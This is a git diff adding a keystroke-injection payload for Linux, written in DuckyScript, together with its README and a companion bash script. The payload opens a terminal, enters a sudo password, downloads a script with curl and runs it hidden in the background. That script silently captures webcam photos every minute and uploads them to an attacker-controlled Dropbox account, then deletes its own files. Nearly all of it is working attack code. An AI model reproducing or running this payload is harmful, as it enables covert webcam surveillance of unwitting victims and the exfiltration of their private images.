diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md new file mode 100644 index 0000000..f952878 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md @@ -0,0 +1,56 @@ +# Exfiltrate Photos Through Shell - Linux ✅ + +A script used to exfiltrate photos using fswebcam shell command. + +**Category**: Exfiltration + +## Description + +A script used to exfiltrate photos using fswebcam shell command. The permissions is needed for give the executation permission to the script downloaded. + +## Getting Started + +### Dependencies + +* An internet connection +* Linux system +* Dropbox Token, or whatever you want, for the exfiltration +* sudo permission +* 'fswebcam' installed but you can install it with the payload + +### Executing program + +* Plug in your device + +### Settings + +* Dropbox Token - You should change it into the script.sh file, line 7. + +```Python +TOKEN=your_dropbox_token +``` + +* This section of sudo time depends by the computer power on which it runs. So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is (so 5000) set now or smaller depending on your needs. + +```DuckyScript +STRING SUDO-PSWD +ENTER +REM DELAY Based On Computer Power +DELAY 5000 +``` + +* If you want to install the fswebcam dependency, you should uncomment it. This DELAY (so 5000), like the previous one, is dynamic and in this case relies on the power of the Internet. + +```DuckyScript +REM STRING apt install fswebcam -y +REM ENTER +REM DELAY Based On Internet Power +REM DELAY 5000 +``` + +* Generally does not need much time + +```DuckyScript +REM DELAY Based On Internet Power +DELAY 4000 +``` diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt new file mode 100644 index 0000000..c6b01e8 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt @@ -0,0 +1,52 @@ +REM ################################################## +REM # | +REM # Title : Exfiltrate Photos Through Shell | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Linux | +REM # | +REM ################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..) +REM - sudo permissions +REM - if you need to install 'fswebcam' +REM - for add the -x permission to the script.sh downloaded + +REM REQUIRED - replace example.com with your script.sh link +DEFINE SCRIPT-SH-LINK example.com + +REM REQUIRED - sudo Password +DEFINE SUDO-PSWD example + +DELAY 1000 +CTRL ALT t +DELAY 2000 + +REM #### Permission #### +REM This section of sudo time depends by the computer power on which it runs. +REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs. + +STRINGLN sudo su +DELAY 500 +STRINGLN SUDO-PSWD +REM DELAY Based On Computer Power +DELAY 5000 + +REM If you want to install the dependency of fswebcam you should decommend it. +REM STRING apt install fswebcam -y +REM ENTER +REM DELAY Based On Internet Power +REM DELAY 5000 + +REM #### Script #### +STRINGLN curl #SCRIPT-SH-LINK > script.sh +REM DELAY Based On Internet Power +DELAY 4000 + +STRINGLN chmod +x script.sh +DELAY 500 + +STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/script.sh b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/script.sh new file mode 100644 index 0000000..65c7ab7 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/script.sh @@ -0,0 +1,32 @@ +#!/bin/bash + +USER=$(whoami) + +DIR=/home/$USER/tmp + +TOKEN=your_dropbox_token + +mkdir -p $DIR + +function remove_folder { + rm -rf "$DIR" + rm -rf "/home/$USER/script.sh" +} + +trap remove_folder EXIT + +# execute the for, for some times.. +for i in {1..10} +do + NAME=$(date +%s%N).jpg + + fswebcam --no-banner $DIR/$NAME + + curl -X POST https://content.dropboxapi.com/2/files/upload \ + --header "Authorization: Bearer $TOKEN" \ + --header "Dropbox-API-Arg: {\"path\": \"/$NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \ + --header "Content-Type: application/octet-stream" \ + --data-binary @$DIR/$NAME + + sleep 60 +done